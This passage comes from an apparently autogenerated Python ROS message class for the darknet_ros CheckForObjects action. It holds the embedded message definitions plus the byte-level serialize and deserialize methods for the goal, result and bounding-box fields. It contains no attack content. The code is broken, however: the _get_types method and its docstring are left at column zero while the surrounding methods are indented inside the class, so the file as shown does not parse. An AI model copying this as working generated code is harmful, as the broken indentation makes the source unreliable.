# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: actionlib_msgs/GoalID
# The stamp should store the time at which this goal was requested.
# It is used by an action server when it tries to preempt all
# goals that were requested before a certain time
time stamp
# The id provides a way to associate feedback and
# result message with specific goal requests. The id
# specified must be unique.
string id
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsGoal
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Check if objects in image
# Goal definition
int16 id
sensor_msgs/Image image
================================================================================
MSG: sensor_msgs/Image
# This message contains an uncompressed image
# (0, 0) is at top-left corner of image
#
Header header # Header timestamp should be acquisition time of image
# Header frame_id should be optical frame of camera
# origin of frame should be optical center of camera
# +x should point to the right in the image
# +y should point down in the image
# +z should point into to plane of the image
# If the frame_id here and the frame_id of the CameraInfo
# message associated with the image conflict
# the behavior is undefined
uint32 height # image height, that is, number of rows
uint32 width # image width, that is, number of columns
# The legal values for encoding are in file src/image_encodings.cpp
# If you want to standardize a new string format, join
# ros-users@lists.sourceforge.net and send an email proposing a new encoding.
string encoding # Encoding of pixels -- channel meaning, ordering, size
# taken from the list of strings in include/sensor_msgs/image_encodings.h
uint8 is_bigendian # is this data bigendian?
uint32 step # Full row length in bytes
uint8[] data # actual matrix data, size is (step * rows)
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsActionResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
CheckForObjectsResult result
================================================================================
MSG: actionlib_msgs/GoalStatus
GoalID goal_id
uint8 status
uint8 PENDING = 0 # The goal has yet to be processed by the action server
uint8 ACTIVE = 1 # The goal is currently being processed by the action server
uint8 PREEMPTED = 2 # The goal received a cancel request after it started executing
# and has since completed its execution (Terminal State)
uint8 SUCCEEDED = 3 # The goal was achieved successfully by the action server (Terminal State)
uint8 ABORTED = 4 # The goal was aborted during execution by the action server due
# to some failure (Terminal State)
uint8 REJECTED = 5 # The goal was rejected by the action server without being processed,
# because the goal was unattainable or invalid (Terminal State)
uint8 PREEMPTING = 6 # The goal received a cancel request after it started executing
# and has not yet completed execution
uint8 RECALLING = 7 # The goal received a cancel request before it started executing,
# but the action server has not yet confirmed that the goal is canceled
uint8 RECALLED = 8 # The goal received a cancel request before it started executing
# and was successfully cancelled (Terminal State)
uint8 LOST = 9 # An action client can determine that a goal is LOST. This should not be
# sent over the wire by an action server
#Allow for the user to associate a string with GoalStatus for debugging
string text
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Result definition
int16 id
darknet_ros_msgs/BoundingBoxes bounding_boxes
================================================================================
MSG: darknet_ros_msgs/BoundingBoxes
Header header
Header image_header
BoundingBox[] bounding_boxes
================================================================================
MSG: darknet_ros_msgs/BoundingBox
float64 probability
int64 xmin
int64 ymin
int64 xmax
int64 ymax
int16 id
string Class
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsActionFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
CheckForObjectsFeedback feedback
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Feedback definition
"""
__slots__ = ['action_goal','action_result','action_feedback']
_slot_types = ['darknet_ros_msgs/CheckForObjectsActionGoal','darknet_ros_msgs/CheckForObjectsActionResult','darknet_ros_msgs/CheckForObjectsActionFeedback']
  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommended
    use is keyword arguments as this is more robust to future message
    changes. You cannot mix in-order arguments and keyword arguments.

    The available fields are:
       action_goal,action_result,action_feedback

    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(CheckForObjectsAction, self).__init__(*args, **kwds)
      # message fields cannot be None, assign default values for those that are
      if self.action_goal is None:
        self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
      if self.action_result is None:
        self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
      if self.action_feedback is None:
        self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
    else:
      # no arguments were given: populate every field with a default sub-message
      self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
      self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
      self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
  def serialize(self, buff):
    """
    serialize message into buffer

    Strings are written as a little-endian uint32 length prefix followed by
    UTF-8 bytes; fixed-size fields use the pre-compiled Structs below.

    :param buff: buffer, ``StringIO``
    """
    try:
      # action_goal.header (std_msgs/Header): seq, stamp, then frame_id string.
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs))
      _x = self.action_goal.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_goal.goal_id (actionlib_msgs/GoalID): stamp then id string.
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs))
      _x = self.action_goal.goal_id.id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_goal.goal: int16 id packed together with the image header ints.
      _x = self
      buff.write(_get_struct_h3I().pack(_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs))
      _x = self.action_goal.goal.image.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # sensor_msgs/Image geometry, encoding, endianness/step and raw pixel data.
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_goal.goal.image.height, _x.action_goal.goal.image.width))
      _x = self.action_goal.goal.image.encoding
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_BI().pack(_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step))
      _x = self.action_goal.goal.image.data
      length = len(_x)
      # - if encoded as a list instead, serialize as bytes instead of string
      if type(_x) in [list, tuple]:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_result.header.
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs))
      _x = self.action_result.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_result.status (actionlib_msgs/GoalStatus): goal_id, status byte, text.
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs))
      _x = self.action_result.status.goal_id.id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_get_struct_B().pack(self.action_result.status.status))
      _x = self.action_result.status.text
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_result.result: int16 id plus the BoundingBoxes message headers.
      _x = self
      buff.write(_get_struct_h3I().pack(_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs))
      _x = self.action_result.result.bounding_boxes.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs))
      _x = self.action_result.result.bounding_boxes.image_header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # BoundingBox[]: uint32 element count, then each element's fixed fields
      # (float64 probability, 4x int64 bounds, int16 id) and its Class string.
      length = len(self.action_result.result.bounding_boxes.bounding_boxes)
      buff.write(_struct_I.pack(length))
      for val1 in self.action_result.result.bounding_boxes.bounding_boxes:
        _x = val1
        buff.write(_get_struct_d4qh().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id))
        _x = val1.Class
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_feedback: header and status (the feedback message itself has no fields).
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs))
      _x = self.action_feedback.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs))
      _x = self.action_feedback.status.goal_id.id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_get_struct_B().pack(self.action_feedback.status.status))
      _x = self.action_feedback.status.text
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance

    Walks the buffer with a [start, end) window; fixed-size fields advance by
    their Struct size, strings by a uint32 length prefix plus that many bytes.

    :param str: byte array of serialized message, ``str``
    """
    try:
      # Lazily create sub-messages so no field is None after deserialization.
      if self.action_goal is None:
        self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
      if self.action_result is None:
        self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
      if self.action_feedback is None:
        self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
      end = 0
      # action_goal.header: 3x uint32 (12 bytes) then length-prefixed frame_id.
      _x = self
      start = end
      end += 12
      (_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_goal.header.frame_id = str[start:end]
      # action_goal.goal_id: stamp (8 bytes) then id string.
      _x = self
      start = end
      end += 8
      (_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.goal_id.id = str[start:end].decode('utf-8')
      else:
        self.action_goal.goal_id.id = str[start:end]
      # action_goal.goal: int16 id + image header ints (14 bytes), then frame_id.
      _x = self
      start = end
      end += 14
      (_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.goal.image.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_goal.goal.image.header.frame_id = str[start:end]
      # sensor_msgs/Image: height/width, encoding, is_bigendian/step (5 bytes), data.
      _x = self
      start = end
      end += 8
      (_x.action_goal.goal.image.height, _x.action_goal.goal.image.width,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.goal.image.encoding = str[start:end].decode('utf-8')
      else:
        self.action_goal.goal.image.encoding = str[start:end]
      _x = self
      start = end
      end += 5
      (_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step,) = _get_struct_BI().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      # image.data is kept as raw bytes; never decoded.
      self.action_goal.goal.image.data = str[start:end]
      # action_result.header.
      _x = self
      start = end
      end += 12
      (_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_result.header.frame_id = str[start:end]
      # action_result.status: goal_id, 1-byte status code, text string.
      _x = self
      start = end
      end += 8
      (_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.status.goal_id.id = str[start:end].decode('utf-8')
      else:
        self.action_result.status.goal_id.id = str[start:end]
      start = end
      end += 1
      (self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.status.text = str[start:end].decode('utf-8')
      else:
        self.action_result.status.text = str[start:end]
      # action_result.result: int16 id + BoundingBoxes header (14 bytes), then headers.
      _x = self
      start = end
      end += 14
      (_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.result.bounding_boxes.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_result.result.bounding_boxes.header.frame_id = str[start:end]
      _x = self
      start = end
      end += 12
      (_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end]
      # BoundingBox[]: uint32 count, then 42 fixed bytes (d + 4q + h) plus a
      # Class string per element.
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      self.action_result.result.bounding_boxes.bounding_boxes = []
      for i in range(0, length):
        val1 = darknet_ros_msgs.msg.BoundingBox()
        _x = val1
        start = end
        end += 42
        (_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id,) = _get_struct_d4qh().unpack(str[start:end])
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
          val1.Class = str[start:end].decode('utf-8')
        else:
          val1.Class = str[start:end]
        self.action_result.result.bounding_boxes.bounding_boxes.append(val1)
      # action_feedback: header and status (feedback message itself has no fields).
      _x = self
      start = end
      end += 12
      (_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_feedback.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_feedback.header.frame_id = str[start:end]
      _x = self
      start = end
      end += 8
      (_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8')
      else:
        self.action_feedback.status.goal_id.id = str[start:end]
      start = end
      end += 1
      (self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_feedback.status.text = str[start:end].decode('utf-8')
      else:
        self.action_feedback.status.text = str[start:end]
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer

    NOTE: this message has no numeric-array fields, so the generated body is
    identical to serialize(); the numpy module argument is unused here.

    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
      # action_goal.header, goal_id and goal (see serialize() for layout notes).
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs))
      _x = self.action_goal.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs))
      _x = self.action_goal.goal_id.id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_h3I().pack(_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs))
      _x = self.action_goal.goal.image.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_goal.goal.image.height, _x.action_goal.goal.image.width))
      _x = self.action_goal.goal.image.encoding
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_BI().pack(_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step))
      _x = self.action_goal.goal.image.data
      length = len(_x)
      # - if encoded as a list instead, serialize as bytes instead of string
      if type(_x) in [list, tuple]:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_result.header and status.
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs))
      _x = self.action_result.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs))
      _x = self.action_result.status.goal_id.id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_get_struct_B().pack(self.action_result.status.status))
      _x = self.action_result.status.text
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_result.result and the BoundingBox array.
      _x = self
      buff.write(_get_struct_h3I().pack(_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs))
      _x = self.action_result.result.bounding_boxes.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs))
      _x = self.action_result.result.bounding_boxes.image_header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.action_result.result.bounding_boxes.bounding_boxes)
      buff.write(_struct_I.pack(length))
      for val1 in self.action_result.result.bounding_boxes.bounding_boxes:
        _x = val1
        buff.write(_get_struct_d4qh().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id))
        _x = val1.Class
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
      # action_feedback.header and status.
      _x = self
      buff.write(_get_struct_3I().pack(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs))
      _x = self.action_feedback.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      buff.write(_get_struct_2I().pack(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs))
      _x = self.action_feedback.status.goal_id.id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_get_struct_B().pack(self.action_feedback.status.status))
      _x = self.action_feedback.status.text
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types

    NOTE: this message has no numeric-array fields, so the generated body is
    identical to deserialize(); the numpy module argument is unused here.

    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    try:
      # Lazily create sub-messages so no field is None after deserialization.
      if self.action_goal is None:
        self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
      if self.action_result is None:
        self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
      if self.action_feedback is None:
        self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
      end = 0
      # action_goal.header.
      _x = self
      start = end
      end += 12
      (_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_goal.header.frame_id = str[start:end]
      # action_goal.goal_id.
      _x = self
      start = end
      end += 8
      (_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.goal_id.id = str[start:end].decode('utf-8')
      else:
        self.action_goal.goal_id.id = str[start:end]
      # action_goal.goal: int16 id plus the embedded sensor_msgs/Image.
      _x = self
      start = end
      end += 14
      (_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.goal.image.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_goal.goal.image.header.frame_id = str[start:end]
      _x = self
      start = end
      end += 8
      (_x.action_goal.goal.image.height, _x.action_goal.goal.image.width,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_goal.goal.image.encoding = str[start:end].decode('utf-8')
      else:
        self.action_goal.goal.image.encoding = str[start:end]
      _x = self
      start = end
      end += 5
      (_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step,) = _get_struct_BI().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      # image.data is kept as raw bytes; never decoded.
      self.action_goal.goal.image.data = str[start:end]
      # action_result.header and status.
      _x = self
      start = end
      end += 12
      (_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_result.header.frame_id = str[start:end]
      _x = self
      start = end
      end += 8
      (_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.status.goal_id.id = str[start:end].decode('utf-8')
      else:
        self.action_result.status.goal_id.id = str[start:end]
      start = end
      end += 1
      (self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.status.text = str[start:end].decode('utf-8')
      else:
        self.action_result.status.text = str[start:end]
      # action_result.result and the BoundingBox array (42 fixed bytes per box).
      _x = self
      start = end
      end += 14
      (_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.result.bounding_boxes.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_result.result.bounding_boxes.header.frame_id = str[start:end]
      _x = self
      start = end
      end += 12
      (_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      self.action_result.result.bounding_boxes.bounding_boxes = []
      for i in range(0, length):
        val1 = darknet_ros_msgs.msg.BoundingBox()
        _x = val1
        start = end
        end += 42
        (_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id,) = _get_struct_d4qh().unpack(str[start:end])
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
          val1.Class = str[start:end].decode('utf-8')
        else:
          val1.Class = str[start:end]
        self.action_result.result.bounding_boxes.bounding_boxes.append(val1)
      # action_feedback.header and status.
      _x = self
      start = end
      end += 12
      (_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_feedback.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.action_feedback.header.frame_id = str[start:end]
      _x = self
      start = end
      end += 8
      (_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8')
      else:
        self.action_feedback.status.goal_id.id = str[start:end]
      start = end
      end += 1
      (self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.action_feedback.status.text = str[start:end].decode('utf-8')
      else:
        self.action_feedback.status.text = str[start:end]
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
# Shared Struct for the little-endian uint32 length prefixes; provided by genpy.
_struct_I = genpy.struct_I
def _get_struct_I():
  """Accessor for the shared uint32 length-prefix Struct."""
  global _struct_I
  cached = _struct_I
  return cached
_struct_B = None
